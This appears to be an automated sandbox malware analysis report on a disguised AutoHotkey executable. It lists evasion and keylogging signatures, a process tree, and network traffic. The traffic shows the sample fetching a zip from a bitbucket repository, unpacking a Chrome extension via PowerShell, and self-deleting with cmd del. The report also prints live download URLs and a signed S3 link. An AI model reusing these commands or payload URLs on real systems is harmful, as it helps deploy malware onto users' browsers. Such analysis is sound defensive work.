Loading ...

Play interactive tourEdit tour

Windows Analysis Report Your File Is Ready To Download.exe

Overview

General Information

Sample Name:Your File Is Ready To Download.exe
Analysis ID:535019
MD5:b864cefdeac3d2c58de4d14bab8265f1
SHA1:a9e0a49eb09498a97a9b55bf01952e3050b5f777
SHA256:7489f7e92e2ece51c3a05fc381efe352210d16f02326e280ffd4c52821987fa0
Infos:

Most interesting Screenshot:

Detection

Score:51
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Self deletion via cmd delete
Sample or dropped binary is a compiled AutoHotkey binary
Contains functionality to detect sleep reduction / modifications
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates processes with suspicious names
Contains functionality to record screenshots
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Queries keyboard layouts
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Your File Is Ready To Download.exe (PID: 752 cmdline: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: B864CEFDEAC3D2C58DE4D14BAB8265F1)
    • powershell.exe (PID: 160 cmdline: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized MD5: C139654B5C1438A95B321BB01AD63EF6)
      • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', CommandLine: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" , ParentImage: C:\Users\user\Desktop\Your File Is Ready To Download.exe, ParentProcessId: 752, ProcessCommandLine: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', ProcessId: 160
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132833201138172459.160.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Your File Is Ready To Download.exeVirustotal: Detection: 19%Perma Link
Antivirus / Scanner detection for submitted sampleShow sources
Source: Your File Is Ready To Download.exeAvira: detected
Source: 1.0.Your File Is Ready To Download.exe.140000000.0.unpackAvira: Label: TR/Agent.pwc
Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.217.81.204:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
Source: Your File Is Ready To Download.exeStatic PE information: certificate valid
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,1_2_00000001400ACC40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,1_2_000000014003C320
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,1_2_00000001400667A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,1_2_0000000140080A40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,1_2_0000000140066AE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00000001400ACB40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,1_2_0000000140081030
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,1_2_0000000140067130
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: Your File Is Ready To Download.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: Your File Is Ready To Download.exe, 00000001.00000003.286269221.0000000000170000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284765053.0000000000176000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369359743.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368941847.000000000016B000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.329995984.0000026935E94000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Your File Is Ready To Download.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 00000008.00000002.329713012.000002692DFFB000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: Your File Is Ready To Download.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.317826184.000002691DDE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: mirroring_hangouts.js.11.drString found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: mirroring_hangouts.js.11.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Your File Is Ready To Download.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: mirroring_hangouts.js.11.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: mirroring_hangouts.js.11.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://accounts.google.com
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://apis.google.com
Source: mirroring_common.js.11.drString found in binary or memory: https://apis.google.com/js/client.js
Source: Your File Is Ready To Download.exeString found in binary or memory: https://autohotkey.com
Source: Your File Is Ready To Download.exeString found in binary or memory: https://autohotkey.comCould
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: Your File Is Ready To Download.exe, 00000001.00000003.284765053.0000000000176000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369359743.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368941847.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284754452.0000000000168000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/J
Source: powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319837164.000002691E980000.00000004.00000001.sdmpString found in binary or memory: https://betasupreme.com
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmpString found in binary or memory: https://betasupreme.com/i/?checksafe=
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmpString found in binary or memory: https://betasupreme.com/i/?nx=
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmpString found in binary or memory: https://betasupreme.com/thankyou/
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmpString found in binary or memory: https://betasupreme.com/uninstalled/
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/Hl
Source: Your File Is Ready To Download.exeString found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zip
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipBs
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipKs
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipR
Source: mirroring_common.js.11.drString found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
Source: pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.drString found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://clients2.google.com
Source: mirroring_hangouts.js.11.dr, mirroring_cast_streaming.js.11.drString found in binary or memory: https://clients2.google.com/cr/report
Source: powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, manifest.json.11.drString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://clients2.googleusercontent.com
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://clients6.google.com
Source: pnacl_public_x86_64_ld_nexe.11.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.11.drString found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: manifest.json.11.drString found in binary or memory: https://content.googleapis.com
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: common.js.11.dr, mirroring_cast_streaming.js.11.drString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d4275cfd-ccb1-4009-b9d1-09d7468f2cf1.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://dns.google
Source: mirroring_common.js.11.drString found in binary or memory: https://docs.google.com
Source: manifest.json.11.drString found in binary or memory: https://feedback.googleusercontent.com
Source: d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://fonts.googleapis.com
Source: manifest.json.11.drString found in binary or memory: https://fonts.googleapis.com;
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://fonts.gstatic.com
Source: manifest.json.11.drString found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: powershell.exe, 00000008.00000002.327714782.000002691F54B000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296712834.000002691FB60000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296556667.000002691FA63000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://hangouts.clients6.google.com
Source: manifest.json.11.drString found in binary or memory: https://hangouts.google.com/
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: mirroring_common.js.11.drString found in binary or memory: https://meet.google.com
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://meetings.clients6.google.com
Source: mirroring_common.js.11.drString found in binary or memory: https://networktraversal.googleapis.com/v1alpha
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://ogs.google.com
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://play.google.com
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.drString found in binary or memory: https://r4---sn-4g5edns6.gvt1.com
Source: data_1.12.drString found in binary or memory: https://r4---sn-4g5edns6.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic?cms_redirect=yes&mh=I2&mip=84.17
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.drString found in binary or memory: https://redirector.gvt1.com
Source: data_1.12.drString found in binary or memory: https://redirector.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic
Source: Your File Is Ready To Download.exeString found in binary or memory: https://sectigo.com/CPS0
Source: Your File Is Ready To Download.exeString found in binary or memory: https://secure.comodo.com/CPS0L
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://ssl.gstatic.com
Source: messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.drString found in binary or memory: https://support.google.com/chromecast/answer/2998456
Source: messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.drString found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
Source: Your File Is Ready To Download.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://www.google.com
Source: data_1.12.drString found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: data_1.12.drString found in binary or memory: https://www.google.com/async/newtab_promos
Source: mirroring_hangouts.js.11.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: manifest.json.11.drString found in binary or memory: https://www.google.com;
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://www.googleapis.com
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: manifest.json.11.drString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: mirroring_common.js.11.drString found in binary or memory: https://www.googleapis.com/calendar/v3
Source: mirroring_common.js.11.drString found in binary or memory: https://www.googleapis.com/hangouts/v1
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.drString found in binary or memory: https://www.gstatic.com
Source: common.js.11.drString found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
Source: manifest.json.11.drString found in binary or memory: https://www.gstatic.com;
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: bitbucket.org
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007D8A0 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,1_2_000000014007D8A0
Source: global trafficHTTP traffic detected: GET /betadevmode/devmode/downloads/block-floc.zip HTTP/1.1User-Agent: AutoHotkeyHost: bitbucket.orgCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22 HTTP/1.1User-Agent: AutoHotkeyCache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:1 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
